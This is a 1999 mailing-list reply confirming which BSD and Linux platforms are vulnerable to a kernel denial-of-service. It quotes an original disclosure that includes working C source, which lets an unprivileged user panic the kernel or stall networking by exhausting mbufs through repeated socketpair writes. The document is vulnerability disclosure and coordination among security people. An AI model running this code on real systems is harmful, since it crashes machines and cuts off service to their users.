Sven,
I have verified the following platforms:
BSDI 2.1
BSDI 3.1
BSDI 4.0
BSDI 4.0.1
Cobalt Linux (MIPS) - RedHat based
All vulnerable.
I am testing on other Linux platforms, but I presume all BSD and
Linux-based systems are affected. I have no resources to test this on
Solaris, AIX, HP and System-V based systems.
I would venture a guess that MacOS X may be vulnerable since I am fairly
sure that most of the socket code is lifted directly from BSD.
JD
On Wed, 1 Sep 1999, Sven Berkvens wrote:
>Recently, I mailed this mailing to a number of people who are concerned
>with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The
>mailing was NOT intended to be made public, but somehow it was. Here is
>my original mailing:
>
>
>--- Forwarded ---
>
>I stumbled across a denial of service attack on FreeBSD systems, where
>an unpriviledged user can panic the kernel. Quick and dirty testing
>(code attached at the end of this mail) showed OpenBSD is vulnerable
>too:
>
>FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
>test it on older FreeBSD versions.
>
>OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:
>The kernel logs one "/bsd: mb_map full" and all processes trying to send
>something over the network get stuck waiting in mbuf. Locally the system
>continues to function. Tested by a friend.
>
>NetBSD: Not available, but it is highly probable that the affected code
>in OpenBSD is from its parent NetBSD.
>
>As far as I'm concerned, this can be handled quietly and without much
>haste. Knowledge of this problem is limited and there is absolutely no
>intention of publishing this exploit or messages to Bugtraq.
>
>With kind regards,
>Sven Berkvens ([EMAIL PROTECTED])
>Long time FreeBSD-system administrator
>
>
>
>The source code for the program that causes this:
>
>#include <unistd.h>
>#include <sys/socket.h>
>#include <fcntl.h>
>
>#define BUFFERSIZE 204800
>
>extern int
>main(void)
>{
> int p[2], i;
> char crap[BUFFERSIZE];
>
> while (1)
> {
> if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
> break;
> i = BUFFERSIZE;
> setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> fcntl(p[0], F_SETFL, O_NONBLOCK);
> fcntl(p[1], F_SETFL, O_NONBLOCK);
> write(p[0], crap, BUFFERSIZE);
> write(p[1], crap, BUFFERSIZE);
> }
> exit(0);
>}
>
>----- End forwarded message -----
>
===========================================
John N Dvorak | [EMAIL PROTECTED]
Director of Technology
CapuNet, LLC - Corporate Internet Solutions
(301) 881-4900 x8018
===========================================
